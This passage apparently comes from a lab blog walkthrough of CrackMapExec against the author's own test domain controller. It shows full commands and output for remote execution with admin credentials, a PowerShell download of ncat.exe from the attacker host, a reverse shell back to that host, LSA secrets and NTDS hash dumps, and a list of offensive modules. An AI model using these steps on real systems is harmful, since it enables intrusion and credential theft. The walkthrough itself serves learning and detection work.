CME 10.0.0.105:445 SECNIK-2K19 351     13     6056   13148  0.67    4304 0  WmiPrvSE
CME 10.0.0.105:445 SECNIK-2K19 174     11     2872   9004   0.05    4520 0  WmiPrvSE
CME 10.0.0.105:445 SECNIK-2K19
CME 10.0.0.105:445 SECNIK-2K19
CME 10.0.0.105:445 SECNIK-2K19 <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
Very nice that we can use this tool to execute PowerShell commands from our Kali host. Hmmm. I wonder what else we can do. Let's see if we can get the host to download a malicious binary. Let's load Python's SimpleHTTPServer on port 443. Before we do that though, let's understand the directory structure of the host by executing:
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "dir c:\\" --exec-method smbexec
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Executed command via smbexec
CME 10.0.0.105:445 SECNIK-2K19 Volume in drive C has no label.
CME 10.0.0.105:445 SECNIK-2K19 Volume Serial Number is DA96-0589
CME 10.0.0.105:445 SECNIK-2K19
CME 10.0.0.105:445 SECNIK-2K19 Directory of c:\
CME 10.0.0.105:445 SECNIK-2K19
CME 10.0.0.105:445 SECNIK-2K19 09/15/2018 12:19 AM <DIR> PerfLogs
CME 10.0.0.105:445 SECNIK-2K19 03/14/2019 12:37 PM <DIR> Program Files
CME 10.0.0.105:445 SECNIK-2K19 09/15/2018 02:08 AM <DIR> Program Files (x86)
CME 10.0.0.105:445 SECNIK-2K19 03/19/2019 03:41 PM <DIR> Tools
CME 10.0.0.105:445 SECNIK-2K19 03/03/2019 11:19 PM <DIR> Users
CME 10.0.0.105:445 SECNIK-2K19 03/13/2019 07:55 PM <DIR> Windows
CME 10.0.0.105:445 SECNIK-2K19 0 File(s) 0 bytes
CME 10.0.0.105:445 SECNIK-2K19 6 Dir(s) 31,761,924,096 bytes free
[*] KTHXBYE!
Let's now see if we can download "ncat.exe" and place it in the "Tools" folder. First, we set up our web server using Python's SimpleHTTPServer on port 443.
root@securitynik:/usr/share/ncat-w32# ls
ncat.exe README
root@securitynik:/usr/share/ncat-w32# file ncat.exe
ncat.exe: PE32 executable (console) Intel 80386, for MS Windows
root@securitynik:/usr/share/ncat-w32# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
Once again, we will leverage PowerShell, this time to get the host to download "ncat.exe" from our attacking machine.
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -X "(New-Object System.Net.WebClient).DownloadFile('http://10.0.0.100:443/ncat.exe','c:\tools\ncat.exe')"
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Executed command
CME 10.0.0.105:445 SECNIK-2K19 #< CLIXML
CME 10.0.0.105:445 SECNIK-2K19 <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
To verify "ncat.exe" has been downloaded successfully, let's browse the tools directory:
root@securitynik:/# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "dir c:\tools\ncat.exe" --exec-method smbexec
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Executed command via smbexec
CME 10.0.0.105:445 SECNIK-2K19 Volume in drive C has no label.
CME 10.0.0.105:445 SECNIK-2K19 Volume Serial Number is DA96-0589
CME 10.0.0.105:445 SECNIK-2K19
CME 10.0.0.105:445 SECNIK-2K19 Directory of c:\tools
CME 10.0.0.105:445 SECNIK-2K19
CME 10.0.0.105:445 SECNIK-2K19 04/03/2019 07:29 PM 1,667,584 ncat.exe
CME 10.0.0.105:445 SECNIK-2K19 1 File(s) 1,667,584 bytes
CME 10.0.0.105:445 SECNIK-2K19 0 Dir(s) 31,757,164,544 bytes free
[*] KTHXBYE!
We can also confirm the file was downloaded by looking at the output from Python's SimpleHTTPServer:
root@securitynik:/usr/share/ncat-w32# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
10.0.0.100 - - [03/Apr/2019 22:20:47] "GET / HTTP/1.1" 200 -
10.0.0.100 - - [03/Apr/2019 22:20:47] code 404, message File not found
10.0.0.100 - - [03/Apr/2019 22:20:47] "GET /favicon.ico HTTP/1.1" 404 -
10.0.0.105 - - [03/Apr/2019 22:29:32] "GET /ncat.exe HTTP/1.1" 200 -
Nice!! Let's wrap up this "ncat.exe" portion by getting a reverse shell sent to us from the domain controller to which we just uploaded "ncat.exe". Let's first set up our listener on our Kali (attacking) machine. We will use port 443, which typically carries encrypted traffic. However, in this case we will not encrypt the traffic, as in another post we will look at the packet analysis of all this activity.
Here is our "ncat" listener on our attacking machine. As you may notice below, it is listening on both IPv4 (0.0.0.0:443) and IPv6 (:::443).
root@securitynik:/cme# ncat --verbose --listen 443 --keep-open --max-conns 1 --nodns
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Now let's execute "ncat.exe" on the remote domain controller via CrackMapExec.
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443" --exec-method smbexec
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
[*] KTHXBYE!
Now it's time to test if we were able to successfully execute "ncat.exe" on the remote device. If we did, we should now have a shell on our attacking machine. Let's see if we were blessed with a shell.
root@securitynik:~/cme# ncat --verbose --listen 443 --keep-open --max-conns 1 --nodns
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.0.0.105.
Ncat: Connection from 10.0.0.105:50602.
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
securitynik\administrator

C:\>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
nakia                    neysa                    nik
Prague                   saadia                   securitynik
The command completed with one or more errors.

C:\>exit
What do you know, we see above we have a shell with system level privileges. Obviously, now that we have this access we can go crazy. However, I will leave it here as I'm still trying to learn more about CrackMapExec. Considering the above, we could even have configured a scheduled task to ensure the shell is sent to us on a daily basis at a certain time.
Let's move on to something different. Let's first look at grabbing credentials from the LSA process.
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --lsa
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping LSA Secrets
CME 10.0.0.105:445 SECNIK-2K19 SECURITYNIK\SECNIK-2K19$:aad3b435b51404eeaad3b435b51404ee:7683fb6c93f423dddeaab188cec6c4d7:::
CME 10.0.0.105:445 SECNIK-2K19 DPAPI_SYSTEM:010000004cfe7f1570df81dc0106e97aa01a607494b3b79a2c6c1d5c51fa01f8dcfee4433a922b2cc3e661aa
CME 10.0.0.105:445 SECNIK-2K19 NL$KM:4464bf81f673d67d247f4b7154892396524ee8d8605a42bbbc54901af2b62beb606815c92c17f71ecf7fbe14a476e0d9ca3f27570a51b2a9c8457664842d9094
[*] KTHXBYE!
Let's go further with credentials and see if we can dump the NTDS database. It seems we have two methods to achieve this: the first leverages volume shadow copy (VSS), the second DRSUAPI. DRSUAPI is the faster and recommended method for this tool.
Since I've used other tools such as Metasploit in my book (Learning By Practicing - Hack & Detect: Leveraging the Cyber Kill Chain for Practical Hacking and its Detection via Network Forensics) to grab credentials from AD via VSS, I will try this DRSUAPI method.
On a side note, drsuapi is the protocol used to implement the Directory Replication Service (DRS) Remote Protocol. Think Active Directory with multiple domain controllers needing to replicate data so all domain controllers are in sync and up-to-date.
Now that we are aware of what DRSUAPI is, let's get back to dumping:
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --ntds drsuapi
CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
CME 10.0.0.105:445 SECNIK-2K19 [+] Using the DRSUAPI method to get NTDS.DIT secrets
CME 10.0.0.105:445 SECNIK-2K19 Administrator:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME 10.0.0.105:445 SECNIK-2K19 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CME 10.0.0.105:445 SECNIK-2K19 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c82d13d85e7f4d04b8614295063c1e28:::
CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\nakia:1103:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\neysa:1104:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\securitynik:1105:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\saadia:1106:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\nik:1107:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME 10.0.0.105:445 SECNIK-2K19 Prague:1110:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME 10.0.0.105:445 SECNIK-2K19 SECNIK-2K19$:1000:aad3b435b51404eeaad3b435b51404ee:7683fb6c93f423dddeaab188cec6c4d7:::
Before we close this out, let's take a look at some of the available modules:
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --list-modules
[*] empire_exec      Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] mimikittenz      Executes Mimikittenz
[*] rundll32_exec    Executes a command using rundll32 and Windows's native javascript interpreter
[*] shellinject      Downloads the specified raw shellcode and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
[*] com_exec         Executes a command using a COM scriptlet to bypass whitelisting
[*] enum_chrome      Uses Powersploit's Invoke-Mimikatz.ps1 script to decrypt saved Chrome passwords
[*] tokens           Enumerates available tokens using Powersploit's Invoke-TokenManipulation
[*] mimikatz         Executes PowerSploit's Invoke-Mimikatz.ps1 script
[*] powerview        Wrapper for PowerView's functions
[*] peinject         Downloads the specified DLL/EXE and injects it into memory using PowerSploit's Invoke-ReflectivePEInjection.ps1 script
[*] tokenrider       Allows for automatic token enumeration, impersonation and mass lateral spread using privileges instead of dumped credentials
[*] metinject        Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
[*] eventvwr_bypass  Executes a command using the eventvwr.exe fileless UAC bypass
This post is already a bit longer than I had planned. In another post I will look into using some of the other modules.
Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis